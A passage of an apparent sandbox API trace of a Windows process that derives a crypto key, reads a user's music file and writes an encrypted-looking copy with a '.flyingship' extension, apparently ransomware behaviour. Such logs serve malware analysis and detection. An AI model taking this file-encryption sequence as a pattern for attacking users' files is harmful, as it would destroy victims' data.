lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.268] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.268] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0185.268] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.268] CryptDestroyHash (hHash=0x90af58) returned 1 [0185.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\lwhz.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0185.269] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.270] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0185.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.270] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0185.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0185.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0185.270] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0185.270] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0185.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0185.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0185.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0185.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0185.272] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n")) returned 0x10 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0185.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0185.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0185.272] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\lwhz.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0185.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0185.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0185.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0185.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0185.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.273] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0185.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0185.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0185.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0185.274] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0185.274] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0185.274] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0185.275] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0185.275] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xcfe0, lpOverlapped=0x0) returned 1 [0185.278] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0185.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcfe0) returned 0xbea018 [0185.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0185.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0185.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0185.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcfe0) returned 0xbf7000 [0185.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0185.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.280] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0185.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcfe0) returned 0xbea018 [0185.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.281] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0185.281] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.281] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcfe0) returned 0xbea018 [0185.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0185.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0185.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0185.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0185.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xcfe0) returned 0xa5f008 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0185.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0185.284] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0185.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0185.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0185.284] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0185.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0185.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0185.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0185.285] HeapFree (in: hHeap=0x8a0000, 